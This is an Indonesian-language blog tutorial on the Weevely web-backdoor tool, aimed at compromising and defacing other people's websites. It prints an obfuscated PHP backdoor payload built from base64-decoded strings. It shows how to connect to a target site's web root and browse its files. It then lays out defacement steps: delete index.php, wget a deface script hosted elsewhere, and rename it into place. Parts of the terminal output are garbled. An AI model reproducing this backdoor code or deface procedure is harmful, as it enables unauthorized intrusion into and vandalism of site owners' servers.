Cara menggunakan weevely generate captain linux terminal

chmood

Weevely merupakan sebuah tool web backdoor yang sangat keren,paling tidak menurut saya peribadi. Kenapa ? ya Β karena via console,bagi saya bisa menjalankan tool via konsole merupakan hal yang keren.heheh. Kalau tool GUI kan anak kecil aja juga bisa makeknya.heheh (becanda). Bila kita sudah berhasil upload itu backdoor, kita sudah bisa edit,membuat,download dan upload file hanya dari console terminal.keren kan??heheh.Bagi sahabat – sahabat Β yang memakai backbox linux,tool ini sudah tersedia. Untuk distro lainnya saya kurang tahu.


Oke langsung aja kita bahas cara pemakaiannya.

1.Cara create file backdoor.php nya.. ubah txt uploat ke tempat lain nanti tinggal wget www.target.co.org.net ato apa txt panggil jangan .txt tapi .php

root@cyborg:/home/cyborg# weevely http://www.target.org/images/site/x.php captain


sniper@sniper:~$ sudo su
[sudo] password forΒ sniper:
root@sniper:/home/sniper# weevely generate captain



nanti di home linux :Β weevely.php

dan teman teman : weevely.txt atau weevely nya di ganti dengan yang di dalam web itu boleh./ pokonya format .txt dan upload di shell Β lain, txt tersebut = Β misall saya buat hasil css.txt
tampilan saya upload ke tempat lain dan ambil link nya : di shell lain


kira2 kode: seperti di bawah :)Β 
<?php$orak = str_replace("eq","","eqsteqr_eqreqeeqpleqaceqe");$tfmp="JGM9J2NtwvdW50JzskYT0kX0NPT0tJtwRTtpZihyZXNldCgkYSk9PSdjYtwScgJiYgJGMoJGEpPjMpey";$puqp="XJyYXlftwc2xpYtw2UoJGEsJGMoJGEpLTMpKSkptwKTttwltwY2hvtwICtwc8LycuJGsuJz4nO3tw0=";$facz="RrPSdwdtwGFpbictw7ZWNotwbyAnPCcuJGsuJz4nO2V2YWwotwYmFzZTY0twX2RlY29kZtwShtwwcmVnXtw3J";$aoas="lcGxhYtw2UoYXJyYXkoJy9bXlx3PVxtwzXStw8nLCcvXHMvJyksIGFyctwmtwF5KCcnLCcrtwJytwksIGpvaW4oY";$quxd = $orak("ej", "", "ejbejaejseej6ej4_dejeejcejode");$nqju = $orak("h","","hchrhehatheh_hfuhnhchthihohn");$goeo = $nqju('', $quxd($orak("tw", "", $tfmp.$facz.$aoas.$puqp))); $goeo();?>

yang uda saya tembak :

metode bypass safe mode: admin ini sulit shelll bekerja selain menggunakan caraΒ weevely untuk shell yang gagal bekerja

ok nextΒ 

sniper@sniper:~$ sudo su
[sudo] password forΒ sniper:
root@sniper:/home/sniper# weevely http://www.target.com/css.php captain
Β  Β  Β  ________ Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β __
Β  Β  Β | Β | Β | Β |-----.----.-.--.----' Β |--.--.
Β  Β  Β | Β | Β | Β | Β -__| -__| | Β | -__| Β | Β | Β |
Β  Β  Β |________|_____|____|___/|____|__|___ Β | v1.0
Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  |_____|
Β  Β  Β  Β  Β  Β  Β  Stealth tiny web shell

[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.

[shell.php] [!] Error: No response
reverb $ cd ..3reg/LinuxPackage23/ch/il/do/target.com/public_html/radi
Capten.txts/123reg/LinuxPackage23/ch/il/do/target.com/public_html $ ls
OLD
Promos
Remixed
about.php
closed.php
contact.php
css
css.php
css.txt
footer.php
gallery-config.txt
giles
header.php
heartsonys
images
index.php
photos2014.php
photos2015.php
radioreverb
scripts
sitemap.xml
skin.css
sox
styleie.css
success.php
timthumb.php
untitled folder
winners.php
winners2013.php
winners2014.php
winners2015.php
@:/websites/123reg/LinuxPackage23/ch/il/do/target.com/public_html $

ini contoh saja :

cd .. : liat db atau masuk db

cd spasi nama db boleh juga

ls : spasi nama 'dan akan terlihat semua db di terminal > public_html $ dan db lain.

cat : melihat index.php atau html dll. akan tampil di termilal secara langsung cat spasi index.php langsung ada di layar terminal

rm index.php = remove / hapus index depan web

mv index.txt index.php Β =Β dan ganti dengan Β shell lain script kita buat

wget http://web apa/index.txt << misall script kita

script deface kita buat txt juga teman tapi kita gantung di link lain .. dan tidak tersentuh di web tersebut





Kalau kurang ke T.I Sniper jumpai saya ;)

buat arah depan web gini :



Semoga bermanfa’at….

Category
Komentar